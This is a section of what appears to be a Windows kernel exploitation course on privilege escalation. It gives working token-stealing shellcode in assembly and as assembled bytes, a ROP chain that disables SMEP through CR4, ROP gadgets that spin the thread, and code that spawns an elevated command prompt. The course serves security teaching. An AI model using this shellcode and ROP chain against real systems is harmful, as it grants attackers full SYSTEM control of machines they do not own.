Priv Esc Shellcode

Privilege escalation refers to gaining higher levels of access or permissions beyond what is originally granted, often to exploit vulnerabilities or perform unauthorised actions.

In this section we will revisit security tokens and show how they can be stolen to elevate privileges.

Escalating Privileges

The most privileged account in the Windows operating system is "NT AUTHORITY\SYSTEM", or simply "SYSTEM". It is the built-in system account, with full control over and unrestricted access to system resources.

Using Process Hacker 2 we can see that the System process (PID 4) runs with the highest privileges possible:

Although the System process runs with the highest privileges in the Windows operating system, it is not the same thing as the kernel. The kernel is the core component of the operating system: it manages system resources, provides essential services, and has direct control over hardware and memory.

The System process, on the other hand, is a special process that hosts kernel-mode system threads and runs under the SYSTEM account. Like every other process, it is represented in the kernel by an EPROCESS structure with its own access token, and that token is what we are interested in.

If we have code execution in the kernel context, we can attempt to steal the token from the System process and apply it to our exploit process, escalating our privileges.

Stealing a Token

We previously looked at how to apply a privileged token to another process using the WinDbg debugger. That isn't practical when writing exploits. Doing the same thing with shellcode is a little more involved, but thankfully it isn't too painful!

The diagram below shows how we can enumerate the running processes from within the kernel context:

Note: It is important to resolve the correct offsets. The layout of these data structures differs across operating system versions. The offsets shown are for Windows 10 version 1607.

GS is a segment register on x86 and x64 processors. On 64-bit Windows the operating system uses its base address to reach per-thread and per-processor data structures efficiently.

In kernel mode, the GS base points to the KPCR (Kernel Processor Control Region), which holds per-processor data and control information, including the structures that describe the thread currently running on that processor.

Inside the KPCR, the PrcbData field at offset 0x180 holds the Kernel Processor Control Block (KPRCB) for the current processor. The KPRCB is embedded in the KPCR rather than referenced through a pointer, which is why the shellcode can reach it with a single GS-relative load. It contains processor-specific data and control information, including a pointer to the thread currently running on that processor (KTHREAD).

The ApcState field in the KTHREAD structure holds the thread's Asynchronous Procedure Call (APC) state, a KAPC_STATE structure used to manage the APCs pending for the thread. APCs are a mechanism for executing code asynchronously in a thread's context. Luckily for us, the KAPC_STATE contains a pointer to the EPROCESS structure representing our process.
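
As a rough sketch of how these fields chain together, the C fragment below adds up the offsets that the two loads in the shellcode rely on. The enum and function names are hypothetical (they do not come from any Windows header), and the values are the Windows 10 version 1607 offsets used in this section, so they would need resolving again for any other build.

```c
#include <stdint.h>

/* Offsets for Windows 10 version 1607 (x64), as used in this section.
   The names are illustrative only. */
enum {
    KPCR_PRCB_DATA       = 0x180, /* KPCR.PrcbData (embedded KPRCB)            */
    KPRCB_CURRENT_THREAD = 0x08,  /* KPRCB.CurrentThread (pointer to KTHREAD)  */
    KTHREAD_APC_STATE    = 0x98,  /* KTHREAD.ApcState (embedded KAPC_STATE)    */
    KAPC_STATE_PROCESS   = 0x20   /* KAPC_STATE.Process (pointer to EPROCESS)  */
};

/* Displacement from the GS base to the current-thread pointer. */
uint32_t current_thread_disp(void) {
    return KPCR_PRCB_DATA + KPRCB_CURRENT_THREAD;
}

/* Displacement from a KTHREAD to the pointer to its owning process. */
uint32_t process_disp(void) {
    return KTHREAD_APC_STATE + KAPC_STATE_PROCESS;
}
```

Because both intermediate structures are embedded rather than pointed to, each hop costs one memory read: one at GS base + 0x188 for the thread, and one at thread + 0xB8 for the process.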

Finally, we can enumerate all processes by traversing the ActiveProcessLinks field inside the EPROCESS structure.

Notice that the EPROCESS structure also contains the PID for the process, and a pointer to the assigned token.

The Plan

The plan is to find the process with PID 4, steal the token memory address, and assign it to our exploit process.
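
The plan can be rehearsed safely in user mode before touching the kernel. The sketch below is a simulation only: list_entry, mock_eprocess, find_process, steal_token and link_processes are hypothetical names, and the mock structure models just the three fields the technique relies on, not the real EPROCESS layout.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-ins for LIST_ENTRY and EPROCESS (assumed layout). */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

typedef struct mock_eprocess {
    uint64_t   unique_process_id;
    list_entry active_process_links;
    uint64_t   token;
} mock_eprocess;

/* Recover the owning structure from a pointer to its embedded list entry.
   This is the subtraction the shellcode performs after following Flink. */
static mock_eprocess *from_links(list_entry *entry) {
    return (mock_eprocess *)((char *)entry -
                             offsetof(mock_eprocess, active_process_links));
}

/* Walk the circular list starting after `start`. Returns the process with
   the requested PID, or NULL once the walk arrives back at `start`. */
mock_eprocess *find_process(mock_eprocess *start, uint64_t pid) {
    list_entry *entry = start->active_process_links.flink;
    while (entry != &start->active_process_links) {
        mock_eprocess *proc = from_links(entry);
        if (proc->unique_process_id == pid) {
            return proc;
        }
        entry = entry->flink;
    }
    return NULL;
}

/* Copy the token of the process with `pid` into `current`.
   Returns 1 on success, 0 if no such process was found. */
int steal_token(mock_eprocess *current, uint64_t pid) {
    mock_eprocess *target = find_process(current, pid);
    if (target == NULL) {
        return 0;
    }
    current->token = target->token;
    return 1;
}

/* Helper for experiments: link n mock processes into a circular list. */
void link_processes(mock_eprocess *procs, size_t n) {
    for (size_t i = 0; i < n; i++) {
        procs[i].active_process_links.flink = &procs[(i + 1) % n].active_process_links;
        procs[i].active_process_links.blink = &procs[(i + n - 1) % n].active_process_links;
    }
}
```

Linking a few mock processes with link_processes and calling steal_token(&procs[0], 4) copies the token of the PID 4 entry into the first one. This sketch stops after one full lap of the list and reports failure, and it copies the token value as-is without modelling the reference-count bits.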

Assembly

This assembly code snippet implements the concept of token stealing discussed earlier. It searches for a system process and replaces the token of the current process with the system token.

BITS 64
SECTION .text
    SYS_PID equ 0x04
    PRCB_DATA equ 0x180
    CURRENT_THREAD equ 0x08
    APC_STATE equ 0x98
    PROCESS equ 0x20
    UNIQUE_PROCESS_ID equ 0x2e8
    ACTIVE_PROCESS_LINKS equ 0x2f0
    TOKEN equ 0x358

global main

main:
find_process:
    xor rax, rax                                  ; RAX = 0
    mov rax, [gs:rax+PRCB_DATA+CURRENT_THREAD]    ; RAX = *CurrentThread
    mov rax, [rax+APC_STATE+PROCESS]              ; RAX = *ApcState.Process
    mov r8, rax                                   ; R8 = *ApcState.Process
    mov r9, SYS_PID                               ; R9 = 0x4

next_system_process:
    mov r8, [r8+ACTIVE_PROCESS_LINKS]             ; R8 = ActiveProcessLinks.Flink (next process offset)
    sub r8, ACTIVE_PROCESS_LINKS                  ; R8 = *EPROCESS (next process)
    cmp [r8+UNIQUE_PROCESS_ID], r9                ; is EPROCESS.UniqueProcessId = R9 (0x4)
    jnz next_system_process                       ; if not then loop

found_system_process:
    mov rcx, [r8+TOKEN]                           ; RCX = *EPROCESS.Token
    and cl, 0xf0                                  ; Clear out _EX_FAST_REF RefCnt
    mov [rax+TOKEN], rcx                          ; *ApcState.Process in RAX (current) token
                                                  ; is replaced with the system one
end:
    ret;

The code begins by defining equates (equ) for various offsets used in the assembly code. These offsets represent different fields within the process structures.
Execution starts at the "find_process" label, which locates the EPROCESS structure for the current process.
It uses the xor instruction to clear the rax register and then loads the value at [gs:rax+PRCB_DATA+CURRENT_THREAD] into rax. This sequence of instructions retrieves a pointer to the current thread (KTHREAD).
The next instruction loads the value at [rax+APC_STATE+PROCESS] into rax. This value points to the EPROCESS structure for the current process.
The value in rax is copied to r8, which will be used as a cursor while walking the process list.
The value 0x4 (SYS_PID) is moved into r9. This value represents the unique process ID of the system process.
The code enters a loop labeled "next_system_process" where it updates r8 with the value at [r8+ACTIVE_PROCESS_LINKS]. This is the Flink pointer, which points at the ActiveProcessLinks field inside the next process's EPROCESS structure rather than at the start of that structure.
The code then subtracts ACTIVE_PROCESS_LINKS from r8 to obtain a pointer to the start of the next EPROCESS.
It compares the value at [r8+UNIQUE_PROCESS_ID] with r9 to check if the UniqueProcessId of the current process matches the system process ID. If they don't match, the code jumps to the "next_system_process" label to continue searching.
Once a match is found, the code proceeds to the "found_system_process" label. It loads the value at [r8+TOKEN] into rcx, representing the system token.
The "and" instruction clears the lower 4 bits of cl, effectively clearing the _EX_FAST_REF RefCnt field.
Finally, the value in rcx is moved back into [rax+TOKEN], which updates the current process token with the system token.
The code ends with the "end" label and a ret instruction, indicating the end of the main function.
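
The masking step can be illustrated in C. This is a minimal sketch that assumes, as the assembly does, that the low 4 bits of the token field hold the _EX_FAST_REF reference count on x64; the macro and function names are hypothetical.

```c
#include <stdint.h>

/* Low 4 bits of an _EX_FAST_REF value hold RefCnt on x64 (assumption
   matching the `and cl, 0xf0` instruction in the listing). */
#define FAST_REF_MASK 0xFULL

/* Strip the reference count, leaving the object pointer. */
uint64_t fast_ref_object(uint64_t fast_ref) {
    return fast_ref & ~FAST_REF_MASK;
}

/* Extract the reference count on its own. */
uint64_t fast_ref_count(uint64_t fast_ref) {
    return fast_ref & FAST_REF_MASK;
}
```

The assembly gets the same result by operating on cl alone: clearing the low nibble of the lowest byte leaves the other 60 bits of rcx untouched. For a made-up value such as 0xFFFFC00112233445, the object pointer is 0xFFFFC00112233440 and the count is 5.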

We can assemble this code to produce our shellcode:

copy .\token-theft-x64.asm .\x64.asm
nasm -f bin -o token-theft-x64.bin token-theft-x64.asm
Hex2.exe .\token-theft-x64.bin

We now have shellcode we can use in our exploit.
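
If a converter is not to hand, turning the raw bytes into a C initialiser list is easy to do yourself. The helper below is a hypothetical stand-in, not a reimplementation of Hex2.exe: format_bytes is an invented name, and the eight-bytes-per-line layout is simply an assumption that is easy to read.

```c
#include <stddef.h>
#include <stdio.h>

/* Write `len` bytes from `data` into `out` as comma-separated 0xNN tokens,
   eight per line. Returns the number of characters written (excluding the
   terminating NUL), or -1 if `out` is too small. */
int format_bytes(const unsigned char *data, size_t len,
                 char *out, size_t out_size) {
    size_t used = 0;

    if (out_size == 0) {
        return -1;
    }
    out[0] = '\0';

    for (size_t i = 0; i < len; i++) {
        /* No separator after the last byte; line break after every eighth. */
        const char *sep = (i + 1 == len)     ? ""
                        : ((i + 1) % 8 == 0) ? ",\n"
                                             : ", ";
        int n = snprintf(out + used, out_size - used, "0x%02X%s", data[i], sep);
        if (n < 0 || (size_t)n >= out_size - used) {
            return -1; /* output truncated */
        }
        used += (size_t)n;
    }
    return (int)used;
}
```

Reading the .bin file into a buffer with fread and passing it to format_bytes yields text that can be pasted between the braces of an unsigned char array.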

Shellcode

The shellcode generated by nasm is shown below:

const unsigned char shellcode[] = {
    0x48, 0x31, 0xC0, 0x65, 0x48, 0x8B, 0x80, 0x88, 
    0x01, 0x00, 0x00, 0x48, 0x8B, 0x80, 0xB8, 0x00, 
    0x00, 0x00, 0x49, 0x89, 0xC0, 0x41, 0xB9, 0x04, 
    0x00, 0x00, 0x00, 0x4D, 0x8B, 0x80, 0xF0, 0x02, 
    0x00, 0x00, 0x49, 0x81, 0xE8, 0xF0, 0x02, 0x00, 
    0x00, 0x4D, 0x39, 0x88, 0xE8, 0x02, 0x00, 0x00, 
    0x75, 0xE9, 0x49, 0x8B, 0x88, 0x58, 0x03, 0x00, 
    0x00, 0x80, 0xE1, 0xF0, 0x48, 0x89, 0x88, 0x58, 
    0x03, 0x00, 0x00, 0xC3
};

Add this to your exploit code, replacing the shellcode placeholder.

Recovery

After a successful exploit in the kernel, it is important to restore the processor state and stack to their original state (or to a state where the kernel can recover). This ensures the system's stability and prevents any unintended side effects or crashes that may occur due to the altered state during the exploit.

Restoring the processor and stack helps maintain the integrity of the system and allows it to continue running smoothly.

If we are unable to restore the kernel it is likely that we will encounter a BSOD, and our exploit is useless!

Sometimes a clean recovery is not possible and we have to look at different options, but all is not lost. Bugcheck and Skape published a paper in 2005 called "Kernel-mode Payloads on Windows". The paper contains four innovative techniques for recovering the kernel following an exploit.

Thread Spinning

When a vulnerability is triggered in a non-critical kernel thread, it may be feasible to make that thread loop continuously or remain blocked indefinitely. This strategy is attractive because it removes the need to restore execution gracefully, which simplifies recovery.

Consider running this assembly in your thread:

spin_thread:
    jmp spin_thread

The thread will simply enter this continuous loop and will not affect any other threads in the kernel space.

We will implement thread spinning using ROP:

uint64_t LEA_RAX_RSP_8 = kernelBase + 0x14aa10;
uint64_t MOV_RAX_QWORD_RAX = kernelBase + 0x8f042;
uint64_t JMP_RAX = kernelBase + 0x6e59ec;

We can now amend our ROP chain to include ROP gadgets that will spin the current thread:

// get a pointer to the offset for the rop chain
uint64_t* rop = (uint64_t*)((uint64_t)buffer + offset);

// the rop chain
*(rop + index++) = POP_RCX;
*(rop + index++) = (uint64_t)0x050678;
*(rop + index++) = MOV_CR4_RCX;

// the return address to our shellcode
*(rop + index++) = (uint64_t)alloc;

// spin the thread
*(rop + index++) = (uint64_t)LEA_RAX_RSP_8;
*(rop + index++) = (uint64_t)MOV_RAX_QWORD_RAX;
*(rop + index++) = (uint64_t)JMP_RAX;

printf("[!] Press enter when ready...");
getchar();

Finally, we will create a new thread in our exploit process. Once the token has been replaced, this thread gives us our elevated command prompt while the initial thread spins in the background.

Place the following function somewhere near the top of the exploit code:

DWORD WINAPI ThreadFunc(void* data) {
  Sleep(2000);
  WinExec("cmd.exe", 1);
  return 0;
}

This code sleeps the thread for 2 seconds (whilst the token stealing shellcode is allowed to run) and then spawns a new command prompt.

We can now amend the code to start our new thread:

printf("[!] Press enter when ready...");
getchar();

// create a new thread to escalate privileges on
printf("[+] Creating a privileged thread...\n");
HANDLE thread = CreateThread(NULL, 0, ThreadFunc, NULL, 0, NULL);

Executing the Exploit

Excellent! It's time to run the full exploit on the target and gain escalated privileges:

Congratulations, we have written our first kernel exploit.

This concludes the first section of the course. We will move on to more advanced topics next!

Demo

Work in progress

Exercises

You might want to try out these exercises:

Try to recover the kernel using a different method, such as thread spinning in the shellcode or throwing an exception.
Write the entire exploit from scratch, this time avoiding shellcode and using a ROP chain only.
Consider re-enabling SMEP once the exploit is complete. This can be done with the same ROP gadgets we discovered earlier.
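
For the last exercise, it helps to know that SMEP is controlled by bit 20 of CR4. The sketch below shows the bit arithmetic only; the function names are hypothetical, and 0x050678 is the value the ROP chain in this section writes to CR4. The right value to restore on a real target is whatever CR4 held before the exploit ran, which this sketch does not attempt to discover.

```c
#include <stdint.h>

/* CR4.SMEP is bit 20. */
#define CR4_SMEP_BIT (1ULL << 20)

/* Non-zero if the given CR4 value has SMEP enabled. */
int cr4_smep_enabled(uint64_t cr4) {
    return (cr4 & CR4_SMEP_BIT) != 0;
}

/* Return the CR4 value with SMEP switched on, other bits unchanged. */
uint64_t cr4_with_smep(uint64_t cr4) {
    return cr4 | CR4_SMEP_BIT;
}

/* Return the CR4 value with SMEP switched off, other bits unchanged. */
uint64_t cr4_without_smep(uint64_t cr4) {
    return cr4 & ~CR4_SMEP_BIT;
}
```

With these helpers, cr4_with_smep(0x050678) gives 0x150678, which is the constant a second POP_RCX / MOV_CR4_RCX pair would need to load if all other CR4 bits are to stay as the chain left them.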

